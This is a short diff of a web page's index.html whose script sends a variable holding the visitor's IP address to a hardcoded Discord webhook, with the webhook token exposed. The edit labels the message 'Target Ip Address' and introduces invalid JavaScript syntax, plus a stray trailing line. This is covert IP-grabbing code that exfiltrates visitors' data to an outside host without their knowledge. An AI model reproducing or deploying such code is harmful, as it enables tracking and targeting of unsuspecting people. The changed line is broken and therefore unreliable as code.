--- a/index.html
+++ b/index.html
@@ -5,8 +5,9 @@
         fetch('https://discord.com/api/webhooks/1438560086787096758/-eBrDZO9DFJL6K-bxAwoow2lMNrxQn6nI0Jj74xP_RhC893B_gMIIjxCqztvmPEh1Blv', {
             method: 'POST',
             headers: { 'Content-Type': 'application/json' },
-            body: JSON.stringify({ content: ip })
+            body: JSON.stringify({ content: Target Ip Address:, ip })
         });
     });
 </script>
+
 Separate JavaScript File:
